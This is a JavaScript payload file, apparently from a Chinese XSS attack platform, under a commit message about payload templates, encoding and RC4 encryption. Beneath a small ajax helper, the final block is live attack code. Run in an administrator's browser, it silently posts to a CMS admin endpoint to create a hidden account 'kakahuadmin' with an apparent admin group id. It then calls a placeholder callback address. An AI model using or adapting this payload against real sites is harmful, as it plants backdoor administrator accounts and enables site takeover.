264460650b
1. 完成js模板,我的js模块,可以直接添加修改用于xss的js 2. 采用ace编辑器实现js代码高亮与错误检测 3. 使用js_beautify实现js代码格式化,使用jsmin实现js代码压缩 4. 整合xss'or工具部分功能,自由编码,方便生成最终的payload 5. 增加加密方式RC4,更改默认加密方式为RC4 6. 从旧版本升级并想保留记录的请务必查看Readme里的升级步骤 7. 修复一系列bug
58 lines
1.9 KiB
JavaScript
58 lines
1.9 KiB
JavaScript
var pkav = {
|
|
ajax: function() {
|
|
var xmlHttp;
|
|
try {
|
|
xmlHttp = new XMLHttpRequest();
|
|
} catch (e) {
|
|
try {
|
|
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
|
|
} catch (e) {
|
|
try {
|
|
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
|
|
} catch (e) {
|
|
return false;
|
|
}
|
|
}
|
|
}
|
|
return xmlHttp;
|
|
},
|
|
req: function(url, data, method, callback) {
|
|
method = (method || "").toUpperCase();
|
|
method = method || "GET";
|
|
data = data || "";
|
|
if (url) {
|
|
var a = this.ajax();
|
|
a.open(method, url, true);
|
|
if (method == "POST") {
|
|
a.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
|
|
}
|
|
a.onreadystatechange = function() {
|
|
if (a.readyState == 4 && a.status == 200) {
|
|
if (callback) {
|
|
callback(a.responseText);
|
|
}
|
|
}
|
|
};
|
|
if ((typeof data) == "object") {
|
|
var arr = [];
|
|
for (var i in data) {
|
|
arr.push(i + "=" + encodeURIComponent(data[i]));
|
|
}
|
|
a.send(arr.join("&"));
|
|
} else {
|
|
a.send(data || null);
|
|
}
|
|
}
|
|
},
|
|
get: function(url, callback) {
|
|
this.req(url, "", "GET", callback);
|
|
},
|
|
post: function(url, data, callback) {
|
|
this.req(url, data, "POST", callback);
|
|
}
|
|
};
|
|
if (!window.__x) {
|
|
pkav.post("/admin/index.php?lfj=member&action=addmember", "postdb%5Busername%5D=kakahuadmin&postdb%5Bpasswd%5D=kakahuadmin&postdb%5Bpasswd2%5D=kakahuadmin&postdb%5Bgroupid%5D=3&postdb%5Bemail%5D=kakahuadmin%40qq.com&Submit=%CC%E1%BD%BB", function(rs) {});
|
|
pkav.get("接口地址", function(rs) {});
|
|
window.__x = 1;
|
|
} |